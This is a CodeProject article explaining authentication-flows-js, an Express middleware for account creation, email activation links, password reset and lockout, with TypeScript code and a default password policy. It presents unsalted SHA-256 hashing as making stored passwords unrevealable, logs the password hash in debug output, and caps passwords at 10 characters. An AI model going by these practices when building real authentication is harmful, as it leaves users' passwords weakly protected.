It must be configured with the credentials of the hosting app (for example, SMTP2GO requires a username/password, mailgun requires an API key, and so on). In the emails mentioned earlier, there are links that should be clicked. By clicking on an activation link, for example, the user confirms the registered email is valid. When the server responds to the link, it needs to know which user clicked it. One approach is to encrypt the username together with the expiration date of the link, encode it and send it to the user. But since the AFM ensures the link is used only once, it is stored in the DB anyway: when the link is created, it is stored in the DB, and when it is used, it is removed. If the link is clicked again, the AFM will not find it in the repo and will throw an error. Another approach is to generate a UUID (AKA a “token”) and send it to the user. This token is stored in the repo in the same record as the username, so there is no need to encrypt and encode (and so no need for private/public keys). When the user clicks the link, the AFM searches for it in the repo, and finds who the user is. One way or another, the AFM needs to store something in the repo. The AFM uses the second approach and stores the generated token along with the time the link was created, to track expiration. This is stored in the users table. The AFM is extensible using interceptor classes that can be extended. Their methods are invoked by the AFM at critical points of the flow. For example, the class CreateAccountInterceptor can be extended and its methods can be overridden. Thus, the method postCreateAccount can be implemented so that it is invoked by the AFM after an account is created. The user completes the account creation form and clicks “Submit”. The server (AFM) verifies several things. For example, it validates that the email is valid, that the re-typed password matches the password, and that the password meets the password constraints (length, etc.).
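The single-use, expiring token mechanism just described can be sketched in a few lines. This is illustrative only: the function names loosely mirror the repository API (addLink), consumeLink is a hypothetical helper, and the 24-hour TTL is an assumed value.

```typescript
// Simplified sketch of a single-use, expiring activation link: the token is
// stored with its creation time, and consuming it removes it, so a second
// click fails.
const LINK_TTL_MS = 24 * 60 * 60 * 1000; // assumed 24h expiration

interface LinkRecord { link: string; date: Date; }
const linksByUser = new Map<string, LinkRecord>();

function addLink(username: string, link: string): void {
  linksByUser.set(username, { link, date: new Date() });
}

function consumeLink(link: string, now: Date = new Date()): string {
  for (const [username, rec] of Array.from(linksByUser.entries())) {
    if (rec.link === link) {
      linksByUser.delete(username); // single use: remove on first click
      if (now.getTime() - rec.date.getTime() > LINK_TTL_MS) {
        throw new Error("link expired");
      }
      return username;
    }
  }
  throw new Error("link not found"); // already used, or never issued
}

addLink("user@example.com", "abc123");
console.log(consumeLink("abc123")); // resolves to user@example.com
```

Note how the token doubles as the user lookup key, which is exactly why no encryption or key management is needed in this approach.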
The hosting application can add more validations by extending the CreateAccountInterceptor class. Note that some validations can (and should) be checked by the UI, but the server should be protective in cases where the UI that hosts the AFM is sloppy. The password is hashed (SHA-256) and encoded (Base64). This ensures that the password that is stored in the DB cannot be revealed. Next, we check (in the DB) whether a user with the same email already exists and is enabled. In that case, an error is thrown. Otherwise, a new user is created and stored in the DB, and an email is sent to the user with a unique string. That string is stored in the DB in the same row/document/record as the user. The user receives the email in his inbox, and by clicking the link, he confirms that he created the account. If someone tries to create an account with someone else’s email, the link will not be clicked, so the account will not be activated. When the user clicks the link, the AFM removes this link from the DB (so it cannot be used again) and activates the account (by enabling it).

[Diagram: the create-account flow]

async createAccount(email: string, password: string, retypedPassword: string,
                    firstName: string, lastName: string, serverPath: string) {
    //validate the input:
    AuthenticationFlowsProcessor.validateEmail(email);
    this.validatePassword(password);
    AuthenticationFlowsProcessor.validateRetypedPassword(password, retypedPassword);

    //encrypt the password:
    const encodedPassword: string = shaString(password);

    //make any other additional checks. This lets applications override this impl
    //and add their custom functionality:
    this.createAccountEndpoint.additionalValidations(email, password);

    debug('createAccount() for user ' + email);
    debug('encoded password: ' + encodedPassword);

    let authUser: AuthenticationUser = null;
    try {
        authUser = await this._authenticationAccountRepository.loadUserByUsername( email );
    } catch(unfe) {
        //basically do nothing - we expect the user not to be found.
    }
    debug(`oauthUser: ${authUser}`);

    //if the user exists, but is not activated - we allow re-registration:
    if(authUser) {
        if( !authUser.isEnabled()) {
            await this._authenticationAccountRepository.deleteUser( email );
        }
        else {
            //error - user already exists and is active
            //log.error( "cannot create account - user " + email + " already exist." );
            debug( "cannot create account - user " + email + " already exist." );
            throw new AuthenticationFlowsError( USER_ALREADY_EXIST );
        }
    }

    const authorities: string[] = this.setAuthorities();    //set authorities

    authUser = new AuthenticationUserImpl(
        false,                //start as de-activated
        this._authenticationPolicyRepository
            .getDefaultAuthenticationPolicy().getMaxPasswordEntryAttempts(),
        null,                 //set by the repo-impl
        authorities);
    debug(`authUser: ${authUser}`);

    await this._authenticationAccountRepository.createUser(authUser);

    await this.createAccountEndpoint.postCreateAccount( email );

    const token: string = randomString();
    const activationUrl: string = serverPath + ACTIVATE_ACCOUNT_ENDPOINT + "/" + token;
    //persist the token, so this activation link will be single-use:
    await this._authenticationAccountRepository.addLink( email, token );

    debug("sending registration email to " + email + "; activationUrl: " + activationUrl);
    await this._mailSender.sendEmail(email,
        AUTHENTICATION_MAIL_SUBJECT,
        activationUrl );
}

The user enters their email in the forgot password form, and clicks Submit. The server (AFM) verifies the account exists and is not locked. If it is locked, the AFM throws an error.
Otherwise, an email is sent to the user with a token. That token is stored in the DB in the same row/document/record as the user. The user receives the email in their inbox, and by clicking the link confirms that they issued the “forgot password” flow (to prevent a malicious party from resetting the password of another account). When the user clicks the link (that contains the token), the AFM checks the token (existence and expiration). If it is good, it redirects the user to the “set new password” page. Note that we do not remove this token from the DB yet. The user completes the “set new password” form, and clicks Submit. As in the “create account” flow, the server (AFM) validates that the re-typed password matches the password, verifies that the password meets the password constraints (length, etc.), and then stores the new password (hashed and encoded) in the DB, and removes the token.

[Diagram: the forgot-password flow]

async forgotPassword(email: string, serverPath: string) {
    debug('forgotPassword() for user ' + email);

    AuthenticationFlowsProcessor.validateEmail(email);

    //if the account is already locked, no need to ask the user the secret question:
    if( ! await this._authenticationAccountRepository.isEnabled(email) ) {
        //security note: even if we don't find an email address, we return 'ok'.
        //We don't want untoward bots figuring out
        //what emails are real vs not real in our database.
        //throw new Error( ACCOUNT_LOCKED_OR_DOES_NOT_EXIST );
        return;
    }

    await this.sendPasswordRestoreMail(email, serverPath);
}

An account is locked when the user has exceeded the allowed number of login attempts. When that happens, the “enabled” flag is set to false, and a re-activation email is sent to the user. The flow is very similar to account creation (see diagram).
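The lockout behavior can be sketched roughly like this. The names are illustrative, not the module's actual code; the attempts counter plays the role of the policy's maxPasswordEntryAttempts, and the re-activation email step is only indicated by a comment.

```typescript
// Sketch of account lockout: each failed login decrements a counter, and at
// zero the account is disabled until it is re-activated via an emailed link.
const MAX_ATTEMPTS = 5; // matches the maxPasswordEntryAttempts default

interface Account { enabled: boolean; attemptsLeft: number; }
const accounts = new Map<string, Account>();

function onFailedLogin(email: string): void {
  const acc = accounts.get(email);
  if (!acc || !acc.enabled) return;
  acc.attemptsLeft -= 1;
  if (acc.attemptsLeft <= 0) {
    acc.enabled = false; // locked: a re-activation email would be sent here
  }
}

function onSuccessfulLogin(email: string): void {
  const acc = accounts.get(email);
  if (acc) acc.attemptsLeft = MAX_ATTEMPTS; // reset the counter on success
}

accounts.set("user@example.com", { enabled: true, attemptsLeft: MAX_ATTEMPTS });
for (let i = 0; i < MAX_ATTEMPTS; i++) onFailedLogin("user@example.com");
console.log(accounts.get("user@example.com")!.enabled); // prints false
```

Resetting the counter on every successful login is what keeps an occasional typo from eventually locking a legitimate user out.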
In the change password flow, the user is already signed in, so the AFM does not have to confirm the user’s identity by sending an email; nevertheless, security-wise, the AFM sends an email to the user in this flow as well, to protect against the case where the user left the hosting application open and unguarded, and a malicious party tries to change the password. Therefore, the email is sent not only for confirmation, but for notification as well. In previous versions (before 0.0.82) of the AFM (and also in Java’s authentication-flows), cryptography was used to encrypt the username together with the expiration time of the link, so when the link was clicked, the AFM decrypted it on the server and obtained the username and the expiration for validation. This is no longer needed: the AFM can send just a unique string as a token in the link, which is stored in the DB in relation to the username. When the link is clicked, the AFM searches for the token in the DB and finds the username. There is a sample application that uses `authentication-flows-js`, so it is a great place to start. Below are the required configurations. According to the design, the hosting application chooses which repository it works with, and passes the appropriate adapter:

const app = express();
const authFlows = require('authentication-flows-js');
const authFlowsES = require('authentication-flows-js-elasticsearch');

const esRepo = new authFlowsES.AuthenticationAccountElasticsearchRepository();

authFlows.config({
    user_app: app,
    authenticationAccountRepository: esRepo,
});

Currently, the following repositories are supported:

This module *reuses* the client app’s express server and adds several endpoints to it (e.g., `/createAccount`). Thus, the client app should pass its server object to authentication-flows-js (as in the example above). authentication-flows-js comes with a default set of configurations for the password policy (in /config/authentication-policy-repository-config.json).
The hosting application can replace or edit the JSON file, and use its own preferred values. The password policy contains the following properties (with the following default values):

{
    passwordMinLength: 6,
    passwordMaxLength: 10,
    passwordMinUpCaseChars: 1,
    passwordMinLoCaseChars: 1,
    passwordMinNumbericDigits: 1,
    passwordMinSpecialSymbols: 1,
    passwordBlackList: ["password", "123456"],
    maxPasswordEntryAttempts: 5,
    passwordLifeInDays: 60
}

An example of a client app can be found in the sample application mentioned above. Needless to say, tests are a critical part of any software development. During AFM development, it was important to ensure that working flows were not damaged as code is reused in several flows. There is a separate project for automated tests, based on Cucumber. Explaining Cucumber is out of scope here, but it is worth mentioning that all critical flows are tested – automatically. For example, account creation: there is a test that creates an account, activates it with the link, and then checks that the login works. Another test, for example, is account lock: the test creates an account, activates it, and then fails to login 5 times, until the account is locked. Then, the test re-activates the account using the link, and verifies that login works. All tests use the web API of the AFM. Thus, with each code change during development, all flows could be tested – in seconds – to avoid regressions.

Many thanks to a dear friend, David Goldhar, for helping me with the review.
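As a closing illustration, the password policy shown above could be enforced by a small validator along these lines. This is a sketch, not taken from the module; the field names follow the JSON above (including its original spelling of passwordMinNumbericDigits), and the error strings are made up.

```typescript
// Sketch of enforcing the password policy from the JSON above.
interface PasswordPolicy {
  passwordMinLength: number;
  passwordMaxLength: number;
  passwordMinUpCaseChars: number;
  passwordMinLoCaseChars: number;
  passwordMinNumbericDigits: number;
  passwordMinSpecialSymbols: number;
  passwordBlackList: string[];
}

function validatePasswordAgainstPolicy(password: string, p: PasswordPolicy): string[] {
  const errors: string[] = [];
  // count how many characters match a character class:
  const count = (re: RegExp) => (password.match(re) || []).length;
  if (password.length < p.passwordMinLength) errors.push("too short");
  if (password.length > p.passwordMaxLength) errors.push("too long");
  if (count(/[A-Z]/g) < p.passwordMinUpCaseChars) errors.push("needs upper-case");
  if (count(/[a-z]/g) < p.passwordMinLoCaseChars) errors.push("needs lower-case");
  if (count(/[0-9]/g) < p.passwordMinNumbericDigits) errors.push("needs a digit");
  if (count(/[^A-Za-z0-9]/g) < p.passwordMinSpecialSymbols) errors.push("needs a symbol");
  if (p.passwordBlackList.indexOf(password.toLowerCase()) >= 0) errors.push("blacklisted");
  return errors;
}

const policy: PasswordPolicy = {
  passwordMinLength: 6, passwordMaxLength: 10,
  passwordMinUpCaseChars: 1, passwordMinLoCaseChars: 1,
  passwordMinNumbericDigits: 1, passwordMinSpecialSymbols: 1,
  passwordBlackList: ["password", "123456"],
};

console.log(validatePasswordAgainstPolicy("Aa1!xy", policy).length); // prints 0
```

Returning a list of violations rather than a single boolean lets the UI show the user everything that is wrong with a candidate password at once.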
https://codeproject.freetls.fastly.net/Articles/5300920/Password-Flows-Middleware-for-Express-based-Applic?pageflow=FixedWidth